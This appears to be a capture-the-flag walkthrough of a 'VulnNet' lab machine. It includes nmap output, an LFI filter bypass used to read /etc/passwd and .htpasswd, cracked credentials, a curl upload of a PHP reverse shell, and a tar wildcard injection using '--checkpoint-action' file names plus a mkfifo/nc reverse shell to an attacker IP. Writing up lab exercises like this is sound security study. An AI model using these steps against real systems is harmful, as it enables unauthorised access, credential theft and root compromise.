PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA) | 256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA) |_ 256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: VulnNet Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial nmap results, let’s head to the web server…
In one of the Javascript files we find reference to http://broadcast.vulnnet.net so let’s add that to /etc/passwd and see what’s there.
We get thwacked with a basic authentication screen and it doesn’t seem so easy to bypass. Will return to the web server and see what else we can find first.
The other javascript file we can read has reference to an open PHP url, fuzzing with ffuf using an LFI list we find this endpoint is vulnerable to LFI. We just need a basic filter bypass (…//…//) and we can dump /etc/passwd.
The only user with a shell is server-management, there’s no ssh keys for the user we can grab. We can’t find accessible Apache access logs for poisoning, but we can check the .htpasswd file and see if we can get some users for the subdomain authentication…
We grab the username developers and the MD5 hash so let’s try and crack it.
There we go, developers:9972761drmfsls is our creds. Let’s try the login form we saw earlier.
Exploit DB gives us a situation where we can exploit a module for unauthenticated file upload, so we’ll try a PHP reverse shell…
curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" 'http://broadcast.vulnnet.thm/actions/beats_uploader.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Authorization: Basic ZGV2ZWxvcGVyczo5OTcyNzYxZHJtZnNscw=='
The uploader renames files, but visiting http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR gives us a directory list anyway, so with that we can start up our listener and pop a shell!
With that we can kill our www-data shell and be comfortable in an SSH session.
We find a script owned by root backing up our Documents folder regularly. The tar backup command uses a wildcard so we can easily exploit this.
server-management@vulnnet:/tmp$ cat /var/opt/backupsrv.sh
#!/bin/bash
# Where to backup to.
dest="/var/backups"
# What to backup.
cd /home/server-management/Documents
backup_files="*" Moving to our home directory we create the following files.
touch '--checkpoint=1' touch '--checkpoint-action=exec=sh shell.sh' and finally a quick mkfifo reverse shell in shell.sh #!/bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.105.64 1234 >/tmp/f
All that’s left to do is open another listener and wait for a call…
There’s our shell, and our root flag.
This was a nice room, with multiple not-too-complicated layers to getting a foothold.